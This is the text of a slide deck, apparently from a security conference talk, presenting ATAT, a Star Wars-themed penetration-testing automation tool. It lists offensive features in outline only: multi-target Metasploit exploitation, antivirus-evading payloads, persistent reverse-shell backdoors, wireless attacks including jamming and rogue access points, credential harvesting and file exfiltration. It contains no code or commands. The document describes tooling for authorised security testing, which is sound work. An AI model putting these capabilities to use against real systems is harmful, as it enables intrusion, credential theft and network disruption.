280 likes | 292 Views
Attack Team Automation Tool. Taking on the entire rebellion with 2-3 Stormtroopers. *with Empire approved images & content. About – ll3N1GmAll A th , Sec-, C+, D12. Sith Hacker Lock pick village guy BSidesSTL co-founder Physical security course instructor
E N D
Attack Team Automation Tool Taking on the entire rebellion with 2-3 Stormtroopers *with Empire approved images & content
About – ll3N1GmAll Ath, Sec-, C+, D12 • Sith • Hacker • Lock pick village guy • BSidesSTL co-founder • Physical security course instructor • Infosec dentist (see Jayson Street’s talk on failure) • Certified cert haver (with 12 essential certifications & minerals!) • Daniel 11:32b (KJV)
Impetus –(╯°□°)╯︵ ┻━┻ • Vulnerability reports missing items like…ports… • Yeah, apparently that’s a thing • Large scopes, small squads, & tight deadlines • The need to use “Empire approved” existing tools • Features I wish existed; but that didn’t • Efficiency • Repeatability • Automation • Starts services, automates repetitive actions, etc • Noobs
Substance • Simplicity is the best design choice • Well known industry standard Empire approved tools given ergonomic handles and “auto-pilot” functions • Poweshell Empire • Metasploit • Msfvenom • LBD • SSLScan • masscan • MPC • DBD • Still under active development • Fully Automated Windows, OSX, & Linux Privilege Escalation With Powershell Empire • POC attacks
Origin • Metasploit automation script called “ezsploit” by rand0m1ze on github • ATAT is to ezsploit what SET is to BBQSQL • Nearly identical menu structure and layout • Every existing option has been completely rewritten and/or enhanced significantly • Except for 2; more on those later • Many new options that did not exist in the original script • ATAT has over 500% more Rebel smashing goodness than its predecessor!
Features – Payloads • Create every conceivable Metasploit payload via MPC with ATAT’s built in payload creation “wizard”…I hate that term… • No AV gigs • All OSes • AV WIP
Features – Multi-Target Exploitation • Basically RHOSTS for exploit modules with common options • This feature works with modules that only require: LHOST, LPORT, RHOST, RPORT, & PAYLOAD or less • This limitation is overcome by creating separate menu options for unique exploit types as you will see
Features – Multi-Target Struts/Tomcat • RHOSTS feature for Apache Struts & Tomcat exploit modules • Adds: • SRVPORT • TARGETURI • HttpUsername • HttpPassword
Features – Multi-Target Java JMX • RHOSTS feature for the Java JMX exploit module • Adds: • SRVPORT • JMXRMI
Features – Multi-Target Java RMI • RHOSTS feature for the Java RMI exploit module • Adds: • SRVPORT • HTTPDELAY
Features – Multi-Target SNMP Enum • Support for SNMP enumeration AUX module • Integrated for simplicity; not necessity
Features – Multi-Target LBD • Multi-target load balancer detection • All results echo to screen along with being captured in a log within the ATAT directory
Features – Multi-Target Masscan all TCP • Masscan all TCP ports(0-65535) against multiple targets • Rate limited sufficiently to prevent network meltdown; while still scanning very fast • All results echo to screen along with being captured in a log within the ATAT directory • Pause/Resume supported • Automatically feeds SSLScan
Features – Multi-Target SSLScan • Multi-target SSLScan script (auto-fed by masscan/nmap) • All results echo to screen along with being captured in a log within the ATAT directory • Results further sorted into these groups: • RC4, SSLv2, heartbleed, freak, weak ciphers, expired certs, SSL certs found
Features – Bloodhound • Installs Bloodhound and dependencies • Provides instructions for simple 1st time setup • Launches Neo4j console and Bloodhound interface automatically
Features – Multi-Port Exploit • Launch 1 exploit at 1 target on multiple ports • Why? • Remember my earlier mention of vulnerability scan reports with port information missing? • When service identification isn’t providing clear information…_______ all the _______!!! • Non-standard • Banner/ID Fails • RPORTS
Features – Multi-Port Auxiliary • Launch 1 auxiliary module against many hosts (where RHOSTS is supported) & against as many ports on each host as you wish • Basically RPORTS functionality for AUX modules • Again, for checking targets with reports of a vulnerability without complete information about where the service is running • And where the service may not be running on a standard port • Hopefully none of you find yourself in need of these multi-port features; but if you do…nothing else will do… • Searching for things on random ports
Features – Listeners & PostEx • Create any type of listener Metasploit has to offer with built in intelligent automated post exploitation features • Identifies the target’s platform • Runs a wide array of applicable post exploitation modules using MSF’s own relied upon logic; but with a larger than normal set of post exploitation modules than MSF’s default
Features – Persistence • Durandal backdoor builder by Skysploit (Travis Weathers) • Updated to work with newer gcc-mingw-w64-i686 compiler • Persistent encrypted daemonized reverse shells for: • Windows • Linux/NetBSD/FreeBSD/OpenBSD • Required significant fixes to function • Persistent encrypted daemonized bind shells for: • Windows • Work in progress • Linux/NetBSD/FreeBSD/OpenBSD • Work in progress • Android Meterpreter APK builder • Encrypted (HTTPS protocol) • Persistent • Stable
Features – Empire & DeathStar • Launches Powershell Empire Console & RESTful API • Launches DeathStar Domain Admin Automation Tool • Admin PSE REST API • Create/Kill/Use • Listeners • Stagers – WIP 21/31 • Agents • Fully Automated Post Ex • Windows – WIP • Linux – WIP • OSX – WIP
Features – Wireless Attacks • HostAPD-WPE • Enterprise WPA Fake RADIUS Attacks • Enterprise WPA Challenge / Response Pair Cracking • Asleap • John The Ripper • Airgeddon • DoS • WPA/WPA2 Online & Offline Attacks • Aircrack • Hashcat • Handshake tools (capturing & cleaning) • Evil Twin / Rogue AP Attacks • WPS Attacks • Reaver • Bully • WEP Attacks • Why not right? • WiFi Jammer
Features – Data Exfiltration • Push Files via SCP • Creds required • Generates SCP command syntax for uploading to target • Push Files with Powershell & Meterpreter • Starts Apache • Generates MSF command for uploading a files to target • Generates PSH command for pulling files from attacker machine to target • Pull Files with Meterpreter • Generates MSF command to download files from target via Meterpreter • Wireless Password Stealer (plaintext) • Windows 32 & 64 bit Credential Harvester • Grabs nearly every imaginable password and private key type
Features – Dependency Checker Prepare, charge, & make ready the laser cannons Installs and/or configures: • PowerShell Empire • DeathStar • pip install various python dependencies • gcc • gcc-mingw-w64-i686 • DBD • Curl • Jq • Bettercap • HostAPD-WPE • Airgeddon • Bloodhound • Etc., Etc., Etc….
Remaining Items –¯\_(ツ)_/¯ • Option 3 – Msfconsole • Shortcut to launch msfconsole; very minor fixes to make this work • Otherwise, no reason to alter this • Option 5 – Armitage • Shortcut to launch Armitage GUI; very minor fixes to make this work • Otherwise, no reason to alter this *this slide not approved by the Galactic Empire
Platforms • Tested on: • Kali • Parrot OS • Kali chroot environment on Android • Use ATAT-chrootGithub repo ATAT-chroot has been customized for use in a Kali chroot environment.
Demo Time • Exploit with automated post exploitation
Source • https://github.com/ll3N1GmAll/ATAT • Compatible with the current gcc-MingW-W64 compiler package that is available on newer systems (32 & 64 bit) • https://github.com/ll3N1GmAll/ATAT-chroot • Ported to chroot environment for Android mobile usage • https://github.com/ll3N1GmAll/ATAT_deprecated • Compatible with the older MingW32 compiler package on older systems (32 & 64 bit) • No longer maintained
Contacts (twits & IRC) • @ll3NiGmAll • Not very active on the twits • ll3N1GmAll • Much more active on IRC • lll3N1GmAlll • Alternate nick • Email/Etc. • Come talk to me